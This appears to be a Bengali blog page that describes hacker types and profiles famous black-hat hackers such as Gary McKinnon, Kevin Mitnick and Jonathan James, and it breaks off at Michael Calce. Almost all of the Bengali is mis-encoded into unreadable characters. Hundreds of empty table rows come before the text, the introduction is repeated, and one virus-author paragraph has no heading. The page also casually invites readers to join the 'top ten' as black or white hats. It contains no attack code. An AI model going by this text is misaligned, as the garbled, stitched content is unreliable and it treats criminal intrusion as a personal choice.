| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
| ||
|
IMPORTENT SOME SOFTWARE FREE DOWNLOAD
WORLD TOP 10 HACKER DETAILS..
%%%%āĻš্āϝাāĻাāϰ
āύাāĻŽ āĻļুāύāϞেāĻ āĻĒ্āϰāĻĨāĻŽেāĻ āϝে āĻিāύিāϏāĻা āĻāĻŽাāϰ āĻোāĻেāϰ āϏাāĻŽāύে āĻেāϏে āĻāϏে āϤা āĻšāϞ āύিāĻেāϰ
āϏাāĻāĻে āĻāĻāĻা āĻাāϞো āĻĄিāĻĢেāϏ āĻĒেāĻ।āϝāĻĻিāĻ āĻেāĻŦāϞ āĻā§েāĻŦāϏাāĻāĻ āĻš্āϝাāĻ āĻāϰাāĻ āĻš্āϝাāĻাāϰেāϰ āĻাāĻ
āύা।
āĻāϰāĻ āĻ
āύেāĻ āĻাāĻ āĻāĻে।āĻāĻŦাāϰ āĻŽূāϞ āĻāĻĨাā§ āĻāϏা āϝাāĻ।āĻাāĻāĻেāϞে āĻāĻŽি ‘āĻŦ্āϞ্āϝাāĻ āĻš্āϝাāĻ
āĻš্āϝাāĻাāϰ’ āĻļāĻŦ্āĻĻāĻা āĻŦ্āϝāĻŦāĻšাāϰ āĻāϰেāĻি।āĻāĻĒāύাāϰা āĻ
āύেāĻেāĻ āĻšā§āϤো āĻাāύেāύ āĻāĻ āĻŦ্āϞ্āϝাāĻ āĻš্āϝাāĻ
āĻš্āϝাāĻাāϰ ,āϝাāϰা āĻাāύেāύ āύা āϤাāĻĻেāϰ āĻāύ্āϝ āĻš্āϝাāĻাāϰ āϏāĻŽ্āĻĒāϰ্āĻে āĻিāĻু āĻāĻĨা āĻĒ্āϰāĻĨāĻŽে āĻŦāϞে
āύিāĻ।
āĻš্āϝাāĻাāϰ āĻে?: āϏাāϧাāϰāύ āĻŦāĻ্āϤāĻŦ্āϝ āϝাāϰা āĻš্āϝাāĻিং āĻāϰে āϤাāϰাāĻ āĻš্āϝাāĻাāϰ।āϤাāĻšāϞে āĻš্āϝাāĻিংāĻা āĻি?āĻš্āϝাāĻিং āĻāĻāĻি āĻĒ্āϰāĻ্āϰিāϝ়া āϝেāĻাāύে āĻেāĻ āĻোāύ āĻŦৈāϧ āĻ āύুāĻŽāϤি āĻাāĻĄ়া āĻোāύ āĻāĻŽ্āĻĒিāĻāĻাāϰ āĻŦা āĻāĻŽ্āĻĒিāĻāĻাāϰ āύেāĻāĻāϝ়াāϰ্āĻে āĻĒ্āϰāĻŦেāĻļ āĻāϰে। āϝাāϰা āĻāĻা āĻāϰে āϤাāϰাāĻ āĻšāĻ্āĻে āĻš্āϝাāĻাāϰ।
āĻš্āϝাāĻাāϰেāϰ āĻĒ্āϰāĻাāϰāĻেāĻĻঃ āĻš্āϝাāĻাāϰāĻĻেāϰ āĻিāĻš্āύিāϤ āĻāϰা āĻšāϝ় Hat āĻŦা āĻুāĻĒি āĻĻিāϝ়ে।āĻš্āϝাāĻাāϰāĻĻেāϰ ā§Š āĻাāĻে āĻŦিāĻāĻ্āϤ āĻāϰা āĻšā§।
Black Hat Hacker: āϏāĻŦāĻেāϝ়ে āĻāϝ়ংāĻāϰ āĻš্āϝাāĻাāϰ āĻšāĻ্āĻে āĻ Black hat hacker । āĻāϰা āĻোāύ āĻāĻāĻি āϏিāĻিāĻāϰিāĻি āϏিāϏ্āĻেāĻŽেāϰ āϤ্āϰুāĻিāĻুāϞো āĻŦেāϰ āĻāϰāϞে āĻĻ্āϰুāϤ āĻ āϤ্āϰুāĻি āĻে āύিāĻেāϰ āϏ্āĻŦাāϰ্āĻĨে āĻাāĻে āϞাāĻাāϝ়। āĻ āϏিāϏ্āĻেāĻŽ āύāώ্āĻ āĻāϰে। āĻŦিāĻিāύ্āύ āĻাāĻāϰাāϏ āĻāĻĄ়িāϝ়ে āĻĻেāϝ়। āĻāĻŦিāώ্āϝāϤে āύিāĻে āĻāĻŦাāϰ āϝেāύ āĻĸুāĻāϤে āĻĒাāϰে āϏে āĻĒāĻĨ āϰাāĻে। āϏāϰ্āĻŦোāĻĒāϰি āĻ āϏিāϏ্āĻেāĻŽেāϰ āĻ āϧীāύে āϝে āϏāĻāϞ āϏাāĻŦ-āϏিāϏ্āĻেāĻŽ āϰāϝ়েāĻে āϏে āĻুāϞোāϤেāĻ āĻĸুāĻāϤে āĻেāώ্āĻা āĻāϰে।āĻš্āϝাāĻাāϰ āĻŦāϞāϤে āĻŽূāϞāϤ āϏāĻŦাāĻ āĻāĻĻেāϰāĻেāĻ āĻŦুāĻিā§ে āĻĨাāĻে।
Grey Hat Hacker: āĻāϰা āĻšāĻ্āĻে āĻĻুāĻŽুāĻো āϏাāĻĒ।āĻāϰা āϝāĻāύ āĻāĻāĻি āĻāĻāĻি āϏিāĻিāĻāϰিāĻি āϏিāϏ্āĻেāĻŽেāϰ āϤ্āϰুāĻি āĻুāϞো āĻŦেāϰ āĻāϰে āϤāĻāύ āϏে āϤাāϰ āĻŽāύ āĻŽāϤ āĻাāĻ āĻāϰāĻŦে। āϤাāϰ āĻŽāύ āĻ āϏāĻŽāϝ় āĻি āĻাāϝ় āϏে āϤাāĻ āĻāϰāĻŦে। āϏে āĻāĻ্āĻে āĻāϰāϞে āĻ āϏিāĻিāĻāϰিāĻি āϏিāϏ্āĻেāĻŽেāϰ āĻŽাāϞিāĻে āϤ্āϰুāĻি āĻাāύাāϤেāĻ āĻĒাāϰে āĻ āĻĨāĻŦা āĻāύāĻĢāϰāĻŽেāĻļāύāĻুāϞো āύāώ্āĻ āĻ āĻāϰāϤে āĻĒাāϰে। āĻāĻŦাāϰ āϤা āύিāĻেāϰ āϏ্āĻŦাāϰ্āĻĨেāϰ āĻāύ্āϝ āĻ āĻŦ্āϝāĻŦāĻšাāϰ āĻāϰāϤে āĻĒাāϰে।
āĻāĻাā§াāĻ āĻāϰো āĻā§েāĻ āϧāϰāύেāϰ āĻš্āϝাāĻাāϰ āϰā§েāĻে।āϝেāĻŽāύঃ Ethical hacker,Script Kiddie,Elite Hacker āĻāϤ্āϝাāĻĻি।
āĻš্āϝাāĻাāϰāĻĻেāϰ āϏাāϧাāϰāύ āĻĒāϰিāĻিāϤি āϤো āĻŦāϞāϞাāĻŽ,āĻāĻŦাāϰ āϤাāĻšāϞে āĻāϏুāύ āĻŦিāĻļ্āĻŦেāϰ āϏেāϰা ā§§ā§Ļ āĻāύ āĻŦ্āϞ্āϝাāĻ āĻš্āϝাāĻ āĻš্āϝাāĻাāϰāĻĻেāϰ āϏাāĻĨে āĻĒāϰিāĻিāϤ āĻšāĻ।







āĻোāĻĄ āĻাāĻĄ়াāϰ āĻŽূāϞ āĻāĻĻ্āĻĻেāĻļ্āϝ āĻিāϞ āĻāύ্āĻাāϰāύেāĻেāϰ āϏাāĻĨে āĻāϤāĻুāϞো āĻāĻŽ্āĻĒিāĻāĻাāϰ āϏংāϝুāĻ্āϤ āĻāĻে āϤা āĻŦেāϰ āĻāϰা। āϤāĻŦে āϤাāĻে āϏāύাāĻ্āϤ āĻāϰāϤে āĻĒুāϞিāĻļেāϰ āĻŦেāĻļি āϏāĻŽāϏ্āϝা āĻšāϝ়āύি āĻাāϰāĻŖ āĻāĻ āĻাāĻāϰাāϏ āĻাāĻĄ়াāϰ āĻĒ্āϰাāϝ় āĻāĻāĻŽাāϏ āĻĒূāϰ্āĻŦে āϤিāύি āĻ্āϝাāĻিং āĻāϰ āϏāĻŽāϝ় āĻāĻ āĻাāĻāϰাāϏ āĻāϰ āĻŦ্āϝাāĻĒাāϰে āĻāĻাāϏ āĻĻিāϝ়েāĻিāϞেāύ āĻāĻāĻি āĻিāϞ āϤাāϰ āĻুāϞ। āϤাāϰ āĻাāώ্āϝāĻŽāϤে , āϤাāϰ āĻাāĻāϰাāϏ āĻāϤৃāĻ āĻāĻ্āϰাāύ্āϤ āĻāĻŽ্āĻĒিāĻāĻাāϰ āĻāϰ āĻোāύ āĻ্āώāϤি āĻšāĻŦে āύা। āĻŽāϰিāϏ āĻŦāϰ্āϤāĻŽাāύে āĻŦৈāĻĻ্āϝুāϤিāĻ āĻĒ্āϰāĻৌāĻļāϞ āĻ āĻāĻŽ্āĻĒিāĻāĻাāϰ āĻŦিāĻ্āĻাāύ āĻŽ্āϝাāϏাāĻুāϏেāĻāϏ āĻāύāϏ্āĻিāĻিāĻāĻ āĻ āĻŦ āĻেāĻāύোāϞāĻি (āĻāĻāĻি) āĻŦিāĻাāĻে āĻাāĻ āĻāϰāĻেāύ।



āϏেāϰা
ā§§ā§Ļ āĻš্āϝাāĻাāϰেāϰ āĻāĻāĻāύ āĻāĻĒāύিāĻ āĻšāϤে āĻĒাāϰেāύ।āĻļুāϧু āĻĒ্āϰā§োāĻāύ āĻāĻ্āĻা āĻ āĻ
āϧ্āϝাāĻŦāϏাā§।āϤāĻŦে
āĻāĻĒāύি Black Hat āĻšāĻŦেāύ, āύা White hat āĻšāĻŦেāύ āϏেāĻা āĻāĻĒāύাāϰ āĻŦ্āϝাāĻĒাāϰ।
āĻš্āϝাāĻাāϰ āĻে?: āϏাāϧাāϰāύ āĻŦāĻ্āϤāĻŦ্āϝ āϝাāϰা āĻš্āϝাāĻিং āĻāϰে āϤাāϰাāĻ āĻš্āϝাāĻাāϰ।āϤাāĻšāϞে āĻš্āϝাāĻিংāĻা āĻি?āĻš্āϝাāĻিং āĻāĻāĻি āĻĒ্āϰāĻ্āϰিāϝ়া āϝেāĻাāύে āĻেāĻ āĻোāύ āĻŦৈāϧ āĻ āύুāĻŽāϤি āĻাāĻĄ়া āĻোāύ āĻāĻŽ্āĻĒিāĻāĻাāϰ āĻŦা āĻāĻŽ্āĻĒিāĻāĻাāϰ āύেāĻāĻāϝ়াāϰ্āĻে āĻĒ্āϰāĻŦেāĻļ āĻāϰে। āϝাāϰা āĻāĻা āĻāϰে āϤাāϰাāĻ āĻšāĻ্āĻে āĻš্āϝাāĻাāϰ।
āĻš্āϝাāĻাāϰেāϰ āĻĒ্āϰāĻাāϰāĻেāĻĻঃ āĻš্āϝাāĻাāϰāĻĻেāϰ āĻিāĻš্āύিāϤ āĻāϰা āĻšāϝ় Hat āĻŦা āĻুāĻĒি āĻĻিāϝ়ে।āĻš্āϝাāĻাāϰāĻĻেāϰ ā§Š āĻাāĻে āĻŦিāĻāĻ্āϤ āĻāϰা āĻšā§।
- White Hat Hacker
- Black Hat hacker
- Grey Hat Hacker
Black Hat Hacker: āϏāĻŦāĻেāϝ়ে āĻāϝ়ংāĻāϰ āĻš্āϝাāĻাāϰ āĻšāĻ্āĻে āĻ Black hat hacker । āĻāϰা āĻোāύ āĻāĻāĻি āϏিāĻিāĻāϰিāĻি āϏিāϏ্āĻেāĻŽেāϰ āϤ্āϰুāĻিāĻুāϞো āĻŦেāϰ āĻāϰāϞে āĻĻ্āϰুāϤ āĻ āϤ্āϰুāĻি āĻে āύিāĻেāϰ āϏ্āĻŦাāϰ্āĻĨে āĻাāĻে āϞাāĻাāϝ়। āĻ āϏিāϏ্āĻেāĻŽ āύāώ্āĻ āĻāϰে। āĻŦিāĻিāύ্āύ āĻাāĻāϰাāϏ āĻāĻĄ়িāϝ়ে āĻĻেāϝ়। āĻāĻŦিāώ্āϝāϤে āύিāĻে āĻāĻŦাāϰ āϝেāύ āĻĸুāĻāϤে āĻĒাāϰে āϏে āĻĒāĻĨ āϰাāĻে। āϏāϰ্āĻŦোāĻĒāϰি āĻ āϏিāϏ্āĻেāĻŽেāϰ āĻ āϧীāύে āϝে āϏāĻāϞ āϏাāĻŦ-āϏিāϏ্āĻেāĻŽ āϰāϝ়েāĻে āϏে āĻুāϞোāϤেāĻ āĻĸুāĻāϤে āĻেāώ্āĻা āĻāϰে।āĻš্āϝাāĻাāϰ āĻŦāϞāϤে āĻŽূāϞāϤ āϏāĻŦাāĻ āĻāĻĻেāϰāĻেāĻ āĻŦুāĻিā§ে āĻĨাāĻে।
Grey Hat Hacker: āĻāϰা āĻšāĻ্āĻে āĻĻুāĻŽুāĻো āϏাāĻĒ।āĻāϰা āϝāĻāύ āĻāĻāĻি āĻāĻāĻি āϏিāĻিāĻāϰিāĻি āϏিāϏ্āĻেāĻŽেāϰ āϤ্āϰুāĻি āĻুāϞো āĻŦেāϰ āĻāϰে āϤāĻāύ āϏে āϤাāϰ āĻŽāύ āĻŽāϤ āĻাāĻ āĻāϰāĻŦে। āϤাāϰ āĻŽāύ āĻ āϏāĻŽāϝ় āĻি āĻাāϝ় āϏে āϤাāĻ āĻāϰāĻŦে। āϏে āĻāĻ্āĻে āĻāϰāϞে āĻ āϏিāĻিāĻāϰিāĻি āϏিāϏ্āĻেāĻŽেāϰ āĻŽাāϞিāĻে āϤ্āϰুāĻি āĻাāύাāϤেāĻ āĻĒাāϰে āĻ āĻĨāĻŦা āĻāύāĻĢāϰāĻŽেāĻļāύāĻুāϞো āύāώ্āĻ āĻ āĻāϰāϤে āĻĒাāϰে। āĻāĻŦাāϰ āϤা āύিāĻেāϰ āϏ্āĻŦাāϰ্āĻĨেāϰ āĻāύ্āϝ āĻ āĻŦ্āϝāĻŦāĻšাāϰ āĻāϰāϤে āĻĒাāϰে।
āĻāĻাā§াāĻ āĻāϰো āĻā§েāĻ āϧāϰāύেāϰ āĻš্āϝাāĻাāϰ āϰā§েāĻে।āϝেāĻŽāύঃ Ethical hacker,Script Kiddie,Elite Hacker āĻāϤ্āϝাāĻĻি।āĻš্āϝাāĻাāϰāĻĻেāϰ āϏাāϧাāϰāύ āĻĒāϰিāĻিāϤি āϤো āĻŦāϞāϞাāĻŽ,āĻāĻŦাāϰ āϤাāĻšāϞে āĻāϏুāύ āĻŦিāĻļ্āĻŦেāϰ āϏেāϰা ā§§ā§Ļ āĻāύ āĻŦ্āϞ্āϝাāĻ āĻš্āϝাāĻ āĻš্āϝাāĻাāϰāĻĻেāϰ āϏাāĻĨে āĻĒāϰিāĻিāϤ āĻšāĻ।
01.Gary McKinnon:
āϏেāϰা āĻš্āϝাāĻাāϰāĻĻেāϰ āĻŽāϧ্āϝে āϝাāϰ āύাāĻŽ āĻĒ্āϰāĻĨāĻŽেāĻ āĻŽāύে āĻāϏে āϤিāύি Solo āĻšিāϏেāĻŦে āĻĒāϰিāĻিāϤ।āϏ্āĻāĻিāĻļ āĻāύ্āϏāĻĒিāϰেāϏিāϰ āĻāĻ āĻĨিāϝ়োāϰিāϏ্āĻ U.S āĻāϰ āĻāϝ়াāϰ āĻĢোāϰ্āϏ, āĻāϰ্āĻŽি, āĻĄিāĻĒাāϰ্āĻāĻŽেāύ্āĻ āĻ āĻŦ āĻĄিāĻĢেāύ্āϏ, āύাāϏা, āύেāĻিāϰ āĻŽāϤ āĻŦāĻĄ় āĻŦāĻĄ় āύেāĻāĻāϝ়াāϰ্āĻে āĻ āĻŦৈāϧāĻাāĻŦে āĻĒ্āϰāĻŦেāĻļ āĻāϰে āĻŦিāĻļ্āĻŦāϰেāĻāϰ্āĻĄ āĻāϰেāύ। āĻ্āϞোāĻŦাāϞ āĻāύাāϰ্āĻি āĻ্āϰাāĻāϏিāϏ āϏāĻŽাāϧাāύেāϰ āύিāĻŽিāϤ্āϤে āĻāĻুāϞো āĻĨেāĻে āϤিāύি āĻāϞিāϝ়েāύ āϏ্āĻĒেāϏāĻ্āϰ্āϝাāĻĢāĻ āĻāϰ āϝাāĻŦāϤীāϝ় āĻĒ্āϰāĻŽাāĻŖাāĻĻি āĻুāϰি āĻ āύāώ্āĻ āĻāϰেāύ āϝা āĻāĻāĻāϏ āĻāĻĻাāϞāϤেāϰ āĻাāώ্āϝāĻŽāϤে āĻĒ্āϰাāϝ় $ā§ā§Ļā§Ļā§Ļ,ā§Ļā§Ļā§Ļ āĻ্āώāϤিāϰ āϏāĻŽāϤুāϞ্āϝ। ⧍ā§Ļā§Ļ⧍ āϏাāϞে āĻāĻ āĻāϏ āĻāϰ্āĻŽিāϰ āϏাāϰ্āĻাāϰ āϏ্āĻ্āϰিāύে “Your security system is crap,” it read. “I am Solo. I will continue to disrupt at the highest levels.” āĻāĻ āĻŽ্āϝাāϏেāĻ āĻĻেāĻা āĻĻিāϝ়েāĻিāϞ āϝা āϤিāύিāĻ āĻāϰেāĻিāϞেāύ। Large scale hackings āĻāϰ āϏূāĻāύা āĻāϰাāϰ āĻŽāϧ্āϝে āĻĻিāϝ়ে āϤিāύি āĻāĻ āĻāϏ āĻāϰ্āĻŽিāϰ āϏাāϰ্āĻাāϰ āĻ āĻšাāĻŽāϞা āĻāϰেāύ। āĻšাāĻŽāϞাāϰ āĻাāϰāĻŖ āĻšিāϏাāĻŦে āĻāϞ্āϞেāĻ āĻāϰāϤে āϤিāύি āĻŦāϞেāύ, “ āĻāĻŽাāϰ āĻŦিāĻļ্āĻŦাāϏ āĻিāϞ āϤাāϰা āĻāĻŽāύ āĻিāĻু āϤāĻĨ্āϝ āϏেāĻাāύে āϞুāĻিāϝ়ে āϰেāĻেāĻিāϞ āϝা āϏāĻāϞেāϰ āĻাāύা āĻĻāϰāĻাāϰ।
Gary McKinnon
02.Kevin Mitnick:
āĻŦিāĻļ্āĻŦেāϰ āϏুāĻĒāϰিāĻিāϤ āĻ āĻāϝ়ংāĻāϰ āĻš্āϝাāĻাāϰāĻĻেāϰ āĻŽāϧ্āϝে āĻŽিāĻāύিāĻ āĻāĻāĻāύ āϝিāύি āĻāĻ্āϝাāϝ়িāϤ āĻšāϝ়েāĻেāύ The most wanted computer criminals in United States āĻāĻŦং The most dangerous hacker in the World āĻšিāϏেāĻŦে। āĻাāĻ āĻোāύ āĻāĻŦং āĻāϝ়েāϏ āĻāύ্āĻ্āϰোāϞেāϰ āĻŽাāϧ্āϝāĻŽে āϏেāϞāĻĢোāύ āĻŦ্āϝāĻŦāĻšাāϰ āĻāϰে āĻŽিāĻāύিāĻ āĻāĻŽ্āĻĒিāĻāĻাāϰ āύেāĻāĻāϝ়াāϰ্āĻ āĻāϰ āĻāĻ্āϏেāϏ āύিāϤেāύ। āĻŽāĻোāϰোāϞাāϰ āĻŽāϤ āĻŦৃāĻšā§ āĻāĻŽ্āĻĒিāĻāĻাāϰ āύেāĻāĻāϝ়াāϰ্āĻ āĻāĻ āĻিāύিāϝ়াāϏেāϰ āĻĻ্āĻŦাāϰা āĻš্āϝাāĻāĻĄ āĻšāϝ়েāĻিāϞ āϝা āϤাāĻে āϏেāĻ āĻĻিāύāĻুāϞিāϤে āĻāϞোāĻāύাāϰ āĻেāύ্āĻĻ্āϰāĻŦিāύ্āĻĻুāϤে āύিāϝ়ে āĻāϏেāĻিāϞ।
Kevin Mitnick
03.Jonathan James:
āĻāĻŦাāϰ āϝাāϰ āĻāĻĨা āĻŦāϞāĻŦ āϤাāϰ āĻাāĻšিāύী āĻļুāύে āĻāĻĒāύাāϰāĻ āĻš্āϝাāĻাāϰ āĻšāϤে āĻāĻ্āĻে āĻāϰāĻŦে।ā§§ā§Ŧ āĻŦāĻāϰ āĻŦāϝ়āϏেāϰ āĻāĻŽেāϰিāĻাāύ āĻāĻ āĻিāĻļোāϰ āĻš্āϝাāĻিংāĻে āĻ্āϝাāϞেāĻ্āĻ āĻšিāϏেāĻŦে āĻ্āϰāĻšāύ āĻāϰেāĻিāϞেāύ āϝা āϤাāĻে ā§§ā§Ŧ āĻŦাāϰেāϰāĻ āĻŦেāĻļি āĻাāϰাāĻাāϰে āύিāϝ়ে āĻিāϝ়েāĻিāϞ। āĻāĻāĻāϏ āĻĄিāĻĢেāύ্āϏ āĻĄিāĻĒাāϰ্āĻāĻŽেāύ্āĻেāϰ āĻāϝ়েāĻŦāϏাāĻāĻ āϤাāϰ āĻāĻ āĻ্āϝাāϞেāĻ্āĻেāϰ āĻŽāϧ্āϝে āĻĒāĻĄ়েāĻিāϞ। āĻāĻ āĻāϏ āĻĄিāĻĢেāύ্āϏ āϏাāϰ্āĻাāϰ āĻĨেāĻে āϤিāύি āĻĒ্āϰাāϝ় āϤিāύ āĻšাāĻাāϰ āĻ āϤিāĻোāĻĒāύ āĻŦাāϰ্āϤা āĻ āĻ āύেāĻ āĻŦ্āϝāĻŦāĻšাāϰāĻাāϰীāϰ āĻĒাāϰ্āϏāĻāϝ়াāϰ্āĻĄ āĻুāϰি āĻāϰেāĻিāϞেāύ। ā§§.ā§ āĻŽিāϞিāϝ়āύ āĻĄāϞাāϰেāϰ āύাāϏা āϏāĻĢāĻāĻāϝ়্āϝাāϰ āĻুāϰি āĻāϰে āύাāϏাāϰ āϏাāϰ্āĻাāϰ āĻ āϏিāϏ্āĻেāĻŽāĻে āĻļাāĻāĻĄাāĻāύ āĻāϰāϤে āĻŦাāϧ্āϝ āĻāϰেāĻিāϞেāύ āϤিāύি। āĻিāύ্āϤা āĻāϰāϤে āĻĒাāϰেāύ āύাāϏাāϰ āϏিāϏ্āĻেāĻŽ āĻļাāĻāĻĄাāĻ! āϏাāĻāĻŦাāϰāϏ্āĻĒেāϏে āϤাāϰ āĻāĻ āĻ āϏ্āĻŦাāĻাāĻŦিāĻ āĻŦ্āϝāĻŦāĻšাāϰ āĻেāĻŽāϏāĻে ā§§ā§Ļ āĻŦāĻāϰ āĻāĻŽ্āĻĒিāĻāĻাāϰ āϏ্āĻĒāϰ্āĻļ āĻāϰা āĻĨেāĻে āĻŦিāϰāϤ āϰাāĻāϤে āĻŦাāϧ্āϝ āĻāϰেāĻিāϞ!!!
Jonathan James
04. Adrian Lamo:
āĻŽাāĻāĻ্āϰোāϏāĻĢāĻ, āĻāϝ়াāĻšু, āϏিāĻিāĻ্āϰুāĻĒ, āĻŦ্āϝাংāĻ āĻ āĻŦ āĻāĻŽেāϰিāĻা, āϏিāĻ্āĻুāϞাāϰ āĻāĻŦং āĻĻ্āϝ āύিāĻāĻāϝ়āϰ্āĻ āĻাāĻāĻŽāϏ āĻāϰ āĻāĻŽ্āĻĒিāĻāĻাāϰ āύেāĻāĻāϝ়াāϰ্āĻ āĻŦ্āϰেāĻāĻĄাāĻāύ āĻāϰে Lamo āϏāϰ্āĻŦāĻĒ্āϰāĻĨāĻŽ āĻŦিāĻļ্āĻŦāϰেāĻāϰ্āĻĄ āĻāϰেāύ। āĻšোāĻŽāϞেāϏ āĻš্āϝাāĻাāϰ āύাāĻŽে āĻĒāϰিāĻিāϤ āĻŦিāĻ্āϝাāϤ āĻāĻ āĻš্āϝাāĻাāϰāĻে ⧍ā§Ļā§Ļ⧍ āϏাāϞে New York āĻāĻĻাāϞāϤেāϰ āύিāϰ্āĻĻেāĻļে āĻāĻ āĻāĻāϰāύেāϰ āĻাāϰāύে ā§Ŧā§Ģ,ā§Ļā§Ļā§Ļ āĻāĻāĻāϏ āĻĄāϞাāϰ āĻāϰিāĻŽাāύা āĻুāύāϤে āĻšāϝ়েāĻিāϞেāύ। ⧍ā§Ļā§§ā§Ļ āϏাāϞে Bradley Manning āĻāϤৃāĻ āĻŦাāĻāĻĻাāĻĻে āĻŦিāĻŽাāύ āĻāĻ্āϰāĻŽāύেāϰ āĻিāĻĄিāĻ āĻāĻāĻিāϞিāĻāϏ āĻāϰ āĻŽাāϧ্āϝāĻŽে āϤিāύিāĻ āĻĒ্āϰāĻাāĻļ āĻāϰেāύ। āĻŦāϰ্āϤāĻŽাāύে āϤিāύি āĻāĻāĻি āĻ āϞাāĻāĻāύāĻ āĻĒ্āϰāϤিāώ্āĻ াāύেāϰ āϏাāĻĨে āĻাāĻ āĻāϰāĻেāύ।
Adrian Lamo
05.George Hotz:
⧍ā§Ļā§§ā§§ āϏাāϞে āϏāύি āĻāϰিāĻāϏāύ āĻāϰ āĻĒ্āϞেāώ্āĻেāĻļāύ āĻেāϞāĻŦ্āϰেāĻ āĻāϰে āϤিāύি āĻĒāϰিāĻিāϤি āϞাāĻ āĻāϰেāύ। āϤāĻŦে āϤাāϰ āĻŦিāĻাāϰ āĻাāϰ্āϝ āĻāϞাāĻাāϞীāύ āϏāĻŽāϝ়ে āϤাāϰ āϏāĻšāϝোāĻীāϰা āϤাāϰ āϤৈāϰি āĻĒāĻĻ্āϧāϤি āĻāύāϏāĻŽāĻ্āώে āĻĒ্āϰāĻাāĻļ āĻāϰে āϝাāϰ āĻĢāϞāĻļ্āϰুāϤিāϤে āĻāύিāύāĻŽাāϏ āĻš্āϝাāĻাāϰāĻ্āϰুāĻĒ āϏāύিāϰ āϏাāϰ্āĻাāϰে āĻšাāĻŽāϞা āĻāϰে āĻĒ্āϰাāϝ় ā§ā§ āĻŽিāϞিāϝ়āύ āĻ্āϰাāĻšāĻেāϰ āϤāĻĨ্āϝ āĻুāϰি āĻāϰে। āϤāĻŦে āϤিāύি āĻ āĻŦিāώāϝ়ে āϤাāϰ āϏāĻŽ্āĻĒৃāĻ্āϤāϤাāϝ় āĻ āϏ্āĻŦীāĻৃāϤি āĻাāύাāϝ়। āϤিāύি āĻŦāϞেāύ “ āĻāĻāĻি āϏাāϰ্āĻাāϰ āĻ āĻāĻ্āϰāĻŽāύ āĻāϰে āĻļুāϧু āĻāĻāĻাāϰ āĻāϰ āϤāĻĨ্āϝ āĻুāϰি āĻāϰাāϰ āĻŽāϤো āĻাāĻ āϤিāύি āĻšāϞে āĻāϰāϤেāύ āύা āĻাāϰāĻŖ āĻāĻি āĻŽোāĻেāĻ āϏāύ্āϤোāώāĻāύāĻ āύāϝ় āĻ āύ্āϤāϤ āϤাāϰ āĻāύ্āϝ।
George Hotz
06. David Smith:
Smith āĻĒāϰিāĻিāϤি āϞাāĻ āĻāϰে āϤাāϰ Melissa āύাāĻŽāĻ āĻ-āĻŽেāĻāϞ āĻাāĻāϰাāϏ āϤৈāϰিāϰ āĻŽাāϧ্āϝāĻŽে।āϤাāϰ āĻাāώ্āϝāĻŽāϤে āĻāĻ āĻাāĻāϰাāϏ āĻিāĻāĻিāĻŽ āĻāϰ āĻোāύ āĻ্āώāϤি āĻāϰে āύা āϤāĻŦে āĻোāύ āĻিāĻāĻিāĻŽ āĻāϰ āϞিāϏ্āĻে āĻĨাāĻা āĻĒ্āϰাāϝ় āϏāĻāϞ āĻ-āĻŽেāĻāϞ āĻ āĻাāĻāϰাāϏ āĻĒ্āϰেāϰāĻŖ āĻāϰে। āĻ āĻāύ্āϝ āϤাāĻে āĻāĻŽেāϰিāĻাāϰ āĻĢেāĻĄাāϰেāϞ āĻĒ্āϰিāĻāύে āϰাāĻা āĻšāϝ় āĻāĻŦং āϤিāύিāĻ āĻāĻāĻŽাāϤ্āϰ āĻŦ্āϝāĻ্āϤি āϝাāĻে āĻāĻŽেāĻāϞ āĻাāĻāϰাāϏ āĻāĻŦিāώ্āĻাāϰেāϰ āĻāύ্āϝ āĻেāϞে āĻĒাāĻ াāύো āĻšāϝ়।
David Smith
07.Michael Calce:
